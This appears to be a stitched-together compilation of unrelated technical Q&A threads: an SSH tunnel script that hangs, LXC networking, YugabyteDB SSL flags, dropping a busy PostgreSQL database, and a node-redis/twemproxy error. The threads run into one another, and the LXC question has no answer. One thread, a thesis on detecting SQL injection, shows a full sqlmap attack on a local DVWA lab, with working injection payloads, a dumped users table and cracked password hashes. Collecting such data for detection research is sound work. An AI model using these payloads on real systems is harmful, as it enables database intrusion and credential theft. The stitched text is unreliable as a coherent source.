I connect to a remote database using sshtunnel. I have no problem connecting to the DB and accessing the data.
My problem is that my script doesn't exit after everything finishes.
I create the connection, download the data, print it, stop the SSH connection, and print 'stop'. The script hangs at server.stop() and never prints 'stop'; I have to interrupt it manually to make it terminate.
This is the code:
from sshtunnel import SSHTunnelForwarder
from sqlalchemy import create_engine
import pandas as pd
server = SSHTunnelForwarder(
    ('host', 22),
    ssh_password='password',
    ssh_username='username',
    remote_bind_address=('127.0.0.1', 3306)
)
server.start()
engine = create_engine(
    'mysql+mysqldb://db_user:db_pass@127.0.0.1:{}/temps'.format(server.local_bind_port))
query = 'SELECT * FROM temp'
df = pd.read_sql(query, engine)
print(df.head())
print(df.tail())
server.stop()
print('stop')
The script never prints 'stop'.
Question: why doesn't this code terminate on its own?
EDIT:
I added
trace_logger = create_logger(loglevel="TRACE")
After this I noticed something interesting: the log for the run with data transfer is missing one line, "Transport is closed". I also checked the code without sending the SQL query, and then the script finished correctly.
Logs with data transfer:
2018-10-07 18:41:43,274| WAR | MainThrea/0967#sshtunnel | Could not read SSH configuration file: ~/.ssh/config
2018-10-07 18:41:43,275| INF | MainThrea/0993#sshtunnel | 0 keys loaded from agent
2018-10-07 18:41:43,275| INF | MainThrea/1042#sshtunnel | 0 keys loaded from host directory
2018-10-07 18:41:43,275| INF | MainThrea/0914#sshtunnel | Connecting to gateway: 192.168.0.102:22 as user ‘xxx’
2018-10-07 18:41:43,275| DEB | MainThrea/0917#sshtunnel | Concurrent connections allowed: True
2018-10-07 18:41:43,275| DEB | MainThrea/1369#sshtunnel | Trying to log in with password: xxx
2018-10-07 18:41:43,600| INF | Srv-56620/1389#sshtunnel | Opening tunnel: 0.0.0.0:56620 <> 127.0.0.1:3306
….. # data transfer
2018-10-07 18:41:43,945| INF | MainThrea/1328#sshtunnel | Closing all open connections...
<Logger sshtunnel.SSHTunnelForwarder (TRACE)>
2018-10-07 18:41:43,945| DEB | MainThrea/1332#sshtunnel | Listening tunnels: 0.0.0.0:56620
2018-10-07 18:41:43,945| INF | MainThrea/1408#sshtunnel | Shutting down tunnel ('0.0.0.0', 56620)
2018-10-07 18:41:44,048| INF | Srv-56620/1395#sshtunnel | Tunnel: 0.0.0.0:56620 <> 127.0.0.1:3306 released
Logs without data transfer:
2018-10-07 18:37:54,016| WAR | MainThrea/0967#sshtunnel | Could not read SSH configuration file: ~/.ssh/config
2018-10-07 18:37:54,017| INF | MainThrea/0993#sshtunnel | 0 keys loaded from agent
2018-10-07 18:37:54,017| INF | MainThrea/1042#sshtunnel | 0 keys loaded from host directory
2018-10-07 18:37:54,017| INF | MainThrea/0914#sshtunnel | Connecting to gateway: 192.168.0.102:22 as user ‘xxx'
2018-10-07 18:37:54,017| DEB | MainThrea/0917#sshtunnel | Concurrent connections allowed: True
2018-10-07 18:37:54,017| DEB | MainThrea/1369#sshtunnel | Trying to log in with password: xxx
2018-10-07 18:37:54,342| INF | Srv-56560/1389#sshtunnel | Opening tunnel: 0.0.0.0:56560 <> 127.0.0.1:3306
2018-10-07 18:37:54,363| INF | MainThrea/1328#sshtunnel | Closing all open connections...
<Logger sshtunnel.SSHTunnelForwarder (TRACE)>
2018-10-07 18:37:54,363| DEB | MainThrea/1332#sshtunnel | Listening tunnels: 0.0.0.0:56560
2018-10-07 18:37:54,363| INF | MainThrea/1408#sshtunnel | Shutting down tunnel ('0.0.0.0', 56560)
2018-10-07 18:37:54,448| INF | Srv-56560/1395#sshtunnel | Tunnel: 0.0.0.0:56560 <> 127.0.0.1:3306 released
2018-10-07 18:37:54,448| DEB | MainThrea/1422#sshtunnel | Transport is closed
After inspecting the logs, it turned out that SQLAlchemy's open connections were the problem.
We created trace_logger = sshtunnel.create_logger(loglevel="TRACE") and passed it to SSHTunnelForwarder.
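For reference, a minimal sketch of how the trace logger can be wired in (same host and credential placeholders as in the question):

import sshtunnel
from sshtunnel import SSHTunnelForwarder

# Create a TRACE-level logger and hand it to the forwarder so every tunnel
# event (including the final "Transport is closed") shows up in the output.
trace_logger = sshtunnel.create_logger(loglevel="TRACE")

server = SSHTunnelForwarder(
    ('host', 22),
    ssh_username='username',
    ssh_password='password',
    remote_bind_address=('127.0.0.1', 3306),
    logger=trace_logger,
)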
For anyone's future reference:
Adding engine.dispose() after pd.read_sql() closes all lingering connections to the database, allowing the SSH tunnel to be closed.
See the relevant SQLAlchemy documentation on engine disposal.
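Applied to the script above, the tail end would look roughly like this (a sketch using the same placeholders as in the question):

query = 'SELECT * FROM temp'
df = pd.read_sql(query, engine)
print(df.head())
print(df.tail())

# Return all pooled connections to the server so nothing keeps the tunnel alive.
engine.dispose()

server.stop()
print('stop')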
Just to add to this in case anyone has the same issue and engine.dispose() doesn't work: I'm on Windows with Python 3.7, and it took me hours to find a solution.
Setting server.daemon_forward_servers = True before server.start() fixed the problem for me.
More references here:
https://github.com/pahaz/sshtunnel/issues/138
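In context, the workaround is one extra line placed after the forwarder is created and before it is started (a sketch; server is the SSHTunnelForwarder instance from the question):

# Mark the forwarding threads as daemon threads so a lingering connection
# cannot block interpreter shutdown (workaround from sshtunnel issue #138).
server.daemon_forward_servers = True
server.start()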
Basically, I want to host a website inside an LXC container. I installed LXD, created a container called app1, and installed apache2 in it. Everything is running, but when I open the container's IP in the browser it gives "This site can't be reached". I disabled ufw, and even removed it entirely, but nothing changed.
Here are the commands I ran to test, with their results:
$ sudo lxc list
| app1 | RUNNING | 10.221.72.14 (eth0) | fd42:969c:2638:6357:216:3eff:fe59:efd7 (eth0) | CONTAINER | 0
$ sudo lxc network ls
| br0 | bridge | NO | | 0 |
+--------+----------+---------+-------------+---------+
| ens3 | physical | NO | | 0 |
+--------+----------+---------+-------------+---------+
| lxdbr0 | bridge | YES | | 2 |
+--------+----------+---------+-------------+---------+
| virbr0 | bridge | NO | | 0 |
$ sudo lxc network show lxdbr0
config:
ipv4.address: 10.221.72.1/24
ipv4.nat: "true"
ipv6.address: fd42:969c:2638:6357::1/64
ipv6.nat: "true"
description: ""
name: lxdbr0
type: bridge
used_by:
- /1.0/instances/app1
- /1.0/profiles/default
managed: true
status: Created
locations:
- none
[Question posted by a user on YugabyteDB Community Slack]
I'm running a YugabyteDB cluster of 3 logical nodes on 1 VM and am trying to enable SSL mode. Below is how I start the cluster with SSL mode on:
./bin/yugabyted start --config /data/ybd1/config_1.config
./bin/yugabyted start --base_dir=/data/ybd2 --listen=127.0.0.2 --join=192.168.56.12
./bin/yugabyted start --base_dir=/data/ybd3 --listen=127.0.0.3 --join=192.168.56.12
my config file:
{
  "base_dir": "/data/ybd1",
  "listen": "192.168.56.12",
  "certs_dir": "/root/192.168.56.12/",
  "allow_insecure_connections": "false",
  "use_node_to_node_encryption": "true",
  "use_client_to_server_encryption": "true"
}
I am able to connect using:
bin/ysqlsh -h 127.0.0.3 -U yugabyte -d yugabyte
ysqlsh (11.2-YB-2.11.1.0-b0)
Type "help" for help.
yugabyte=# \l
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------------+----------+----------+---------+-------------+-----------------------
postgres | postgres | UTF8 | C | en_US.UTF-8 |
system_platform | postgres | UTF8 | C | en_US.UTF-8 |
template0 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
yugabyte | postgres | UTF8 | C | en_US.UTF-8 |
But when I try to connect to the cluster from the psql client, I get the errors below:
psql -h 192.168.56.12 -p 5433
psql: error: connection to server at "192.168.56.12", port 5433 failed: FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
postgres@acff2570dfbc:~$
And in the yb-tserver logs I see the errors below:
I0228 05:00:21.248733 21631 async_initializer.cc:90] Successfully built ybclient
2022-02-28 05:02:21.248 UTC [21624] FATAL: Timed out: OpenTable RPC (request call id 2) to 192.168.56.12:9100 timed out after 120.000s
I0228 05:02:21.251086 21627 poller.cc:66] Poll stopped: Service unavailable (yb/rpc/scheduler.cc:80): Scheduler is shutting down (system error 108)
2022-02-28 05:54:20.987 UTC [23729] LOG: invalid length of startup packet
Any help in this regard is really appreciated.
You're setting your config incorrectly for the yugabyted tool. You want to use --master_flags and --tserver_flags, as explained in the docs: https://docs.yugabyte.com/latest/reference/configuration/yugabyted/#flags.
An example:
bin/yugabyted start --base_dir=/data/ybd1 --listen=192.168.56.12 --tserver_flags=use_client_to_server_encryption=true,ysql_enable_auth=true,use_cassandra_authentication=true,certs_for_client_dir=/root/192.168.56.12/
Sending the parameters this way should work on your cluster.
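Once the cluster is up with client-to-server encryption, you can double-check the connection from any PostgreSQL-compatible client. A minimal sketch in Python follows; the choice of psycopg2, the password, and the SSL mode are illustrative assumptions, not taken from the original thread:

import psycopg2  # YSQL speaks the PostgreSQL wire protocol, so a standard driver works

# Hypothetical connection parameters; adjust host, credentials and sslmode to your setup.
conn = psycopg2.connect(
    host="192.168.56.12",
    port=5433,
    user="yugabyte",
    password="yugabyte",
    dbname="yugabyte",
    sslmode="require",
)
with conn.cursor() as cur:
    cur.execute("SELECT version();")
    print(cur.fetchone())
conn.close()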
I'm writing a thesis for my university.
The topic is "SQL injection detection using machine learning".
To use machine learning, I first need thousands of training samples of SQL injection attacks.
To that end, I followed the process below:
1. Install VirtualBox
2. Install Kali Linux on VirtualBox
3. Install DVWA (Damn Vulnerable Web Application) on Kali Linux
4. Attack DVWA using sqlmap
In step 4, I succeeded in attacking DVWA, but I don't know how to collect a large amount of attack data.
What I want is a large set of the actual attacking SQL queries.
1. Launched the server:
┌──(root💀kali)-[/home/kali]
└─# service apache2 start
┌──(root💀kali)-[/home/kali]
└─# service mysql start
2. Got the cookie and target URL:
document.cookie
"security=low; PHPSESSID=cookieinfo"
3. Attack:
┌──(root💀kali)-[/usr/bin]
└─# sqlmap -o -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=[cookieinfo];security=low" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.4.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:08:01 /2020-12-01/
[10:08:01] [INFO] resuming back-end DBMS 'mysql'
[10:08:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1995 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(1995=1995,1))),0x71626a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qoRd&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9863 FROM (SELECT(SLEEP(5)))PIFI)-- JYNK&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7162707a71,0x744e45686f7a55414a6744636c497367666d62567679764247415656677779516a76584474645269,0x71626a7871)#&Submit=Submit
---
[10:08:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:08:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:08:01] [INFO] fetching current database
[10:08:01] [INFO] fetching tables for database: 'dvwa'
[10:08:01] [INFO] fetching columns for table 'users' in database 'dvwa'
[10:08:01] [INFO] fetching entries for table 'users' in database 'dvwa'
[10:08:01] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[10:08:07] [INFO] writing hashes to a temporary file '/tmp/sqlmaphbMPEH3181/sqlmaphashes-7QbpSl.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:08:12] [INFO] using hash method 'md5_generic_passwd'
[10:08:12] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[10:08:12] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:08:12] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:08:12] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
Database: dvwa
Table: users
[5 entries]
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar | user | password | last_name | first_name | last_login | failed_login |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | /DVWA-master/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2020-11-29 01:54:52 | 0 |
| 2 | /DVWA-master/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2020-11-29 01:54:52 | 0 |
| 3 | /DVWA-master/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2020-11-29 01:54:52 | 0 |
| 4 | /DVWA-master/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2020-11-29 01:54:52 | 0 |
| 5 | /DVWA-master/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2020-11-29 01:54:52 | 0 |
+---------+-----------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[10:08:12] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/users.csv'
[10:08:12] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[10:08:12] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment |
+------------+------+-------------------------+
| 1 | test | This is a test comment. |
+------------+------+-------------------------+
[10:08:13] [INFO] table 'dvwa.guestbook' dumped to CSV file '/root/.local/share/sqlmap/output/localhost/dump/dvwa/guestbook.csv'
[10:08:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost'
[*] ending @ 10:08:13 /2020-12-01/
Again, what I want is a large set of the actual attacking SQL queries.
Could anyone please help? Thank you.
I'm getting the following error when trying to drop a PostgreSQL database, say "test":
postgres=# DROP DATABASE test;
ERROR: database "test" is being accessed by other users
DETAIL: There is 1 other session using the database.
You can use pg_terminate_backend to kill open connections with a query:
Postgres version >= 9.2:
SELECT pg_terminate_backend(pg_stat_activity.pid)
FROM pg_stat_activity
WHERE pg_stat_activity.datname = 'test'
  AND pid <> pg_backend_pid();
Postgres version < 9.2:
SELECT pg_terminate_backend(pg_stat_activity.procpid)
FROM pg_stat_activity
WHERE pg_stat_activity.datname = 'test'
  AND procpid <> pg_backend_pid();
where 'test' is your database name.
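If you want to script the whole thing, here is a minimal sketch in Python; the use of psycopg2, the connection parameters, and running as a superuser against the maintenance database are assumptions for illustration:

import psycopg2

# Connect to a maintenance database, never to the one being dropped.
conn = psycopg2.connect(dbname="postgres", user="postgres", host="localhost")
conn.autocommit = True  # DROP DATABASE cannot run inside a transaction block

with conn.cursor() as cur:
    # Terminate every other session connected to 'test' (PostgreSQL >= 9.2).
    cur.execute(
        "SELECT pg_terminate_backend(pid) "
        "FROM pg_stat_activity "
        "WHERE datname = %s AND pid <> pg_backend_pid();",
        ("test",),
    )
    cur.execute("DROP DATABASE test;")

conn.close()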
1) Run the following command and find out the pid:
postgres=# select * from pg_stat_activity where datname='test';
datid | datname | pid | usesysid | usename | current_query | waiting | xact_start | query_start | backend_start | client_addr | client_port
-------+---------+---------+----------+----------+---------------+---------+------------+-------------------------------+-------------------------------+-------------+-------------
28091 | test | 8481 | 10 | postgres | | f | | 2008-11-12 09:12:50.277096+00 | 2008-11-12 09:11:10.328231+00 | 127.0.0.1 | 43152
2) kill -9 8481 (Here the pid is 8481)
3) Now run
postgres=# drop database test;
DROP DATABASE
The Problem
Connecting directly through redis-cli to my twemproxy will correctly proxy me over to redis without any issues/disconnects. However, when I use node-redis to connect to twemproxy I get the following error:
[Error: Redis connection gone from end event.]
Trace is as follows:
Error: Ready check failed: Redis connection gone from end event.
    at RedisClient.on_info_cmd (/home/vagrant/tests/write-tests/node_modules/redis/index.js:368:35)
    at Command.callback (/home/vagrant/tests/write-tests/node_modules/redis/index.js:418:14)
    at RedisClient.flush_and_error (/home/vagrant/tests/write-tests/node_modules/redis/index.js:160:29)
    at RedisClient.connection_gone (/home/vagrant/tests/write-tests/node_modules/redis/index.js:474:10)
    at Socket.<anonymous> (/home/vagrant/tests/write-tests/node_modules/redis/index.js:103:14)
    at Socket.EventEmitter.emit (events.js:117:20)
    at _stream_readable.js:919:16
    at process._tickCallback (node.js:419:13)
This error occurs whether or not the redis-server is even running, so I am pretty sure it has to do with how node-redis and twemproxy are interacting. Or not interacting, as the case may be.
My Question
Just what the heck is happening?
Background Information
I've got a simple test setup that is as follows:
+------------------+
| +----+----+ |
| | r1 + r2 + |
| +----+----+ |
| | | |
| +---------+ |
| |twemproxy| |
| +---------+ |
| / | \ |
| +----+----+----+ |
| | aw | aw | aw | |
| +----+----+----+ |
+------------------+
aw = api worker
r1/r2 = redis instance
twemproxy = twemproxy
the aw's are currently nodejs clustered on the same host
r1/r2 are instances of node, again on the same host
node version 0.10.x
all three machines are running with very sparse vagrant file. Static IPs assigned to each one for now, private network. Each machine is reachable from every other machine on the specified ports.
After a bit of poking around, I realized this happens because node_redis issues an INFO command on connect by default (its "ready check"), and twemproxy does not forward that command.
Simply adding no_ready_check: true to the connection options solves the issue and lets the connection go through twemproxy.